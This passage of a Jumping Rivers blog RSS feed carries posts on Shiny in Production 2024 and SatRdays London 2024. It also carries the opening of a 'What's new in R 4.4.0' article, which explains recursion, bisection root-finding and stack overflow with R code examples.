For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2024: Call for Abstracts</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/</link><pubDate>Thu, 30 May 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="call-for-abstracts-now-open"&gt;Call for abstracts now open&lt;/h3&gt;
&lt;p&gt;We are excited to announce the Call for Abstracts for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2024&lt;/a&gt;, to be held on 9th-10th October 2024 in Newcastle upon Tyne, UK. This event brings together industry experts, data scientists, and developers to explore the latest advancements and best practices in deploying Shiny applications in production settings.&lt;/p&gt;
&lt;h3 id="about-the-conference"&gt;About the Conference&lt;/h3&gt;
&lt;p&gt;As Shiny continues to revolutionise data visualisation and interactive web applications, the need for robust, scalable, and efficient production environments is more critical than ever. This conference aims to address these needs by providing a platform for knowledge sharing, collaboration, and innovation.&lt;/p&gt;
&lt;p&gt;Whether you’re a seasoned {shiny} user who wants to network and share knowledge, someone who’s just getting started and wants to learn from the experts, or anybody in between, if you’re interested in {shiny}, this conference is for you.&lt;/p&gt;
&lt;h3 id="topics-of-interest"&gt;Topics of Interest&lt;/h3&gt;
&lt;p&gt;We invite abstracts on a wide range of topics, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Scalable Architectures:&lt;/strong&gt; Techniques for scaling Shiny applications to handle large datasets and high user loads.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Security Best Practices:&lt;/strong&gt; Ensuring the security and privacy of data within Shiny applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Performance Optimisation:&lt;/strong&gt; Strategies for improving the speed and responsiveness of Shiny apps.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integration with Other Technologies:&lt;/strong&gt; Combining Shiny with other tools and platforms for enhanced functionality.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Python:&lt;/strong&gt; Developing Shiny apps in Python.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Case Studies:&lt;/strong&gt; Real-world examples of successful Shiny deployments in various industries.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Testing and Continuous Deployment:&lt;/strong&gt; Best practices for maintaining high-quality applications through automated workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To get an idea of past topics, check out our YouTube channel, where we have playlists of talks from Shiny in Production &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD&amp;si=b2GWgsZ-k5WC8QAD" rel="external"&gt;2022&lt;/a&gt; and &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t&amp;si=BGLJYKWc5ZIGwrUZ" rel="external"&gt;2023&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="submission-guidelines"&gt;Submission Guidelines&lt;/h3&gt;
&lt;p&gt;To submit your abstract, please follow these guidelines:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Abstract Length: Up to 250 words.&lt;/li&gt;
&lt;li&gt;Deadline: Submissions must be received by 11:59 on 30th June 2024.&lt;/li&gt;
&lt;li&gt;Submission Portal: Submit your abstract &lt;a href="https://jumpingrivers.typeform.com/to/nxa2aCZ5" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="important-dates"&gt;Important Dates&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Abstract Submission Deadline: 30th June 2024&lt;/li&gt;
&lt;li&gt;Notification of Acceptance: 1st August 2024&lt;/li&gt;
&lt;li&gt;Conference Dates: 9th-10th October 2024&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, visit our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024: Thanks for coming!</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/</link><pubDate>Thu, 09 May 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We wanted to say a huge thank you to everybody who attended &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;SatRdays London 2024&lt;/a&gt;! It was brilliant to see you all there, and we hope you enjoyed the day as much as we did. Thank you to all of our speakers for your contributions; it was great to see such a range of talks and hear about the different ways you can use R in your fields.&lt;/p&gt;
&lt;p&gt;Of course the day wouldn&amp;rsquo;t have been the same without our generous sponsors, so we want to say a huge thank you to &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt; for providing the excellent venue, as well as &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt; for your generous support.&lt;/p&gt;
&lt;p&gt;Couldn&amp;rsquo;t make it on the day? Keep your eyes peeled on our blog and social media, as we&amp;rsquo;ll be releasing recordings of the talks on our &lt;a href="https://youtube.com/@jumping-rivers?si=zmnW9WVphdZkl-8f" rel="external"&gt;YouTube channel&lt;/a&gt; in the coming months. Can&amp;rsquo;t wait that long? Check out &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKLNjt5NnVQ1RgEKeayVVv6G&amp;si=gxRtQ_9fDTzjVR0c" rel="external"&gt;last year&amp;rsquo;s SatRdays London recordings&lt;/a&gt; as well as those from our Shiny in Production conference from &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD&amp;si=i7_xoeVI7o-FRm_9" rel="external"&gt;2022&lt;/a&gt; and &lt;a href="https://www.youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t" rel="external"&gt;2023&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="whats-next"&gt;What&amp;rsquo;s next?&lt;/h3&gt;
&lt;p&gt;Registration is now open for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2024&lt;/a&gt;! This event consists of an afternoon of Shiny-based workshops, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Level Up Your Plots with Cara Thompson&lt;/li&gt;
&lt;li&gt;Building Responsive Shiny Apps&lt;/li&gt;
&lt;li&gt;Asynchronous Shiny&lt;/li&gt;
&lt;li&gt;Building Apps for Humans&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The workshops are followed by a day of talks from Shiny experts across a variety of industries. If you&amp;rsquo;re interested in submitting an abstract, head over to the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; now. Submissions are open until 30th June!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What's new in R 4.4.0?</title><link>https://www.jumpingrivers.com/blog/whats-new-r44/</link><pubDate>Thu, 25 Apr 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/whats-new-r44/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r44/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-r44/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;!--- Introduction --&gt;
&lt;p&gt;R 4.4.0 (“Puppy Cup”) was released on the 24th April 2024 and it is a
beauty. In time-honoured tradition, here we summarise some of the
changes that caught our eyes. R 4.4.0 introduces some cool features (one
of which is experimental) and makes one of our favourite {rlang}
operators available in base R. There are a few things you might need to
be aware of regarding handling &lt;code&gt;NULL&lt;/code&gt; and &lt;code&gt;complex&lt;/code&gt; values.&lt;/p&gt;
&lt;p&gt;The full changelog can be found at the &lt;a href="https://cran.r-project.org/doc/manuals/r-release/NEWS.html" rel="external"&gt;r-release ‘NEWS’
page&lt;/a&gt; and if
you want to keep up to date with developments in base R, have a look at
the &lt;a href="https://cran.r-project.org/doc/manuals/r-devel/NEWS.html" rel="external"&gt;r-devel ‘NEWS’
page&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-whats-new-r44"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="a-tail-recursive-tale"&gt;A tail-recursive tale&lt;/h3&gt;
&lt;p&gt;Years ago, before I’d caused my first stack overflow, my Grandad used to
tell me a daft tale:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;It was on a dark and stormy night,
And the skipper of the yacht said to Antonio,
&amp;quot;Antonio, tell us a tale&amp;quot;,
So Antonio started as follows...
It was on a dark and stormy night,
And the skipper of the yacht .... [ad infinitum]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The tale carried on in this way forever. Or at least it would until you
were finally asleep.&lt;/p&gt;
&lt;p&gt;At around the same age, I was toying with BASIC programming and could
knock out classics such as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;10 PRINT &amp;quot;Ali stinks!&amp;quot;
&amp;gt;20 GOTO 10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Burn! Infinite burn!&lt;/p&gt;
&lt;p&gt;Those were two examples of processes that demonstrate recursion. Antonio’s
tale quotes itself recursively, and my older brother will be repeatedly
mocked unless someone intervenes.&lt;/p&gt;
&lt;p&gt;Recursion is an elegant approach to many programming problems - this
usually takes the form of a function that can call itself. You would use
it when you know how to get closer to a solution, but not necessarily
how to get directly to that solution. And unlike the un-ending examples
above, when we write recursive solutions to computational problems, we
include a rule for stopping.&lt;/p&gt;
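&lt;p&gt;As a minimal sketch of a recursive function with a stopping rule, here is a
finite version of Antonio’s tale. The function name &lt;code&gt;count_tellings()&lt;/code&gt; and
its arguments are made up for illustration:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: tell the tale a fixed number of times
count_tellings = function(remaining, told = 0) {
  # Stopping rule: nothing left to tell, so report how many times we told it
  if (remaining == 0) {
    return(told)
  }
  # Otherwise take one step closer to the stopping rule and recurse
  count_tellings(remaining - 1, told + 1)
}

count_tellings(3)
#&amp;gt; [1] 3
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;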
&lt;p&gt;An example from mathematics would be finding zeros for a continuous
function. The sine function provides a typical example:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-r44/sine-curve-1.svg" alt="Graph of the sine function between 0 and 2*pi" width="50%" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;We can see that when &lt;em&gt;x&lt;/em&gt; = &lt;em&gt;π&lt;/em&gt;, there is a zero for &lt;code&gt;sin(x)&lt;/code&gt;, but the
computer doesn’t know that.&lt;/p&gt;
&lt;p&gt;One recursive solution to finding the zeros of a function, &lt;code&gt;f()&lt;/code&gt;, is the
&lt;a href="https://en.wikipedia.org/wiki/Bisection_method" rel="external"&gt;bisection method&lt;/a&gt;,
which iteratively narrows a range until it finds a point where &lt;code&gt;f(x)&lt;/code&gt; is
close enough to zero. Here’s a quick implementation of that algorithm.
If you need to perform root-finding in R, please don’t use the following
function. &lt;code&gt;stats::uniroot()&lt;/code&gt; is much more robust…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bisect &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(f, interval, tolerance, iteration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, verbose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (verbose) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Iteration {iteration}: Interval [{interval[1]}, {interval[2]}]&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;message&lt;/span&gt;(msg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Evaluate &amp;#39;f&amp;#39; at either end of the interval and return&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# any endpoint where f() is close enough to zero&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lhs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; interval[1]; rhs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; interval[2]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f_left &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(lhs); f_right &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(rhs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abs&lt;/span&gt;(f_left) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; tolerance) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(lhs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abs&lt;/span&gt;(f_right) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; tolerance) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(rhs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;stopifnot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sign&lt;/span&gt;(f_left) &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sign&lt;/span&gt;(f_right))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Bisect the interval and rerun the algorithm&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# on the half-interval where y=0 is crossed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; midpoint &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (lhs &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; rhs) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f_mid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(midpoint)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; new_interval &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sign&lt;/span&gt;(f_mid) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sign&lt;/span&gt;(f_left)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(midpoint, rhs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(lhs, midpoint)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;bisect&lt;/span&gt;(f, new_interval, tolerance, iteration &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, verbose)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We know that &lt;em&gt;π&lt;/em&gt; is somewhere between 3 and 4, so we can find the zero
of &lt;code&gt;sin(x)&lt;/code&gt; as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;bisect&lt;/span&gt;(sin, interval &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;), tolerance &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1e-4&lt;/span&gt;, verbose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 1: Interval [3, 4]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 2: Interval [3, 3.5]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 3: Interval [3, 3.25]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 4: Interval [3.125, 3.25]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 5: Interval [3.125, 3.1875]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 6: Interval [3.125, 3.15625]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 7: Interval [3.140625, 3.15625]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 8: Interval [3.140625, 3.1484375]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 9: Interval [3.140625, 3.14453125]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 10: Interval [3.140625, 3.142578125]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 11: Interval [3.140625, 3.1416015625]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 3.141602&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It takes 11 iterations to get to a point where &lt;code&gt;sin(x)&lt;/code&gt; is within
10&lt;sup&gt;−4&lt;/sup&gt; of zero. If we tightened the tolerance, had a more
complicated function, or had a less precise starting range, it might
take many more iterations to approximate a zero.&lt;/p&gt;
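&lt;p&gt;For comparison, here is a sketch of the same search using
&lt;code&gt;stats::uniroot()&lt;/code&gt;, the function recommended above. Note that its &lt;code&gt;tol&lt;/code&gt;
argument controls the precision of the root itself rather than the size of
&lt;code&gt;f(x)&lt;/code&gt;, so the numbers it reports will not exactly match those from
&lt;code&gt;bisect()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Search for a zero of sin(x) in the same starting interval
res = uniroot(sin, interval = c(3, 4), tol = 1e-4)

res$root  # approximate zero of sin(x), close to pi
res$iter  # number of iterations uniroot() needed
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;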
&lt;p&gt;Importantly, this is a recursive algorithm - in the last statement of
the &lt;code&gt;bisect()&lt;/code&gt; function body, we call &lt;code&gt;bisect()&lt;/code&gt; again. The initial call
to &lt;code&gt;bisect()&lt;/code&gt; (with &lt;code&gt;interval = c(3, 4)&lt;/code&gt;) has to wait until the second
call to &lt;code&gt;bisect()&lt;/code&gt; (&lt;code&gt;interval = c(3, 3.5)&lt;/code&gt;) completes before it can
return (which in turn has to wait for the third call to return). So we
have to wait for 11 calls to &lt;code&gt;bisect()&lt;/code&gt; to complete before we get our
result.&lt;/p&gt;
&lt;p&gt;Those function calls get placed on a computational object named the
&lt;a href="https://en.wikipedia.org/wiki/Call_stack" rel="external"&gt;call stack&lt;/a&gt;. For each
function call, this stores details about how the function was called and
where from. While waiting for the first call to &lt;code&gt;bisect()&lt;/code&gt; to complete,
the call stack grows to include the details about 11 calls to
&lt;code&gt;bisect()&lt;/code&gt;.&lt;/p&gt;
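&lt;p&gt;You can watch the call stack grow from inside R. The sketch below uses
&lt;code&gt;sys.nframe()&lt;/code&gt;, which reports how deep the current function call sits on
the stack. The function &lt;code&gt;stack_depth()&lt;/code&gt; is a made-up helper for
illustration, and we compare two depths rather than printing one, because
the absolute value depends on how the code is being run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: recurse n times, then report the depth of the
# innermost call on the call stack
stack_depth = function(n) {
  depth = sys.nframe()
  if (n == 0) {
    return(depth)
  }
  stack_depth(n - 1)
}

shallow = stack_depth(0)  # no recursive calls
deep = stack_depth(10)    # ten recursive calls
deep - shallow
#&amp;gt; [1] 10
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Each recursive call adds one more entry to the stack, and none of them can be
removed until the innermost call returns.&lt;/p&gt;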
&lt;p&gt;Imagine our algorithm didn’t just take 11 function calls to complete,
but thousands, or millions. The call stack would get really full and
this would lead to a &lt;a href="https://en.wikipedia.org/wiki/Stack_overflow" rel="external"&gt;“stack overflow”
error&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We can demonstrate a stack-overflow in R quite easily:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;blow_up &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(n, max_iter) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (n &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; max_iter) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Finished!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, max_iter)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The recursive function behaves nicely when we only use a small number of
iterations:&lt;/p&gt;
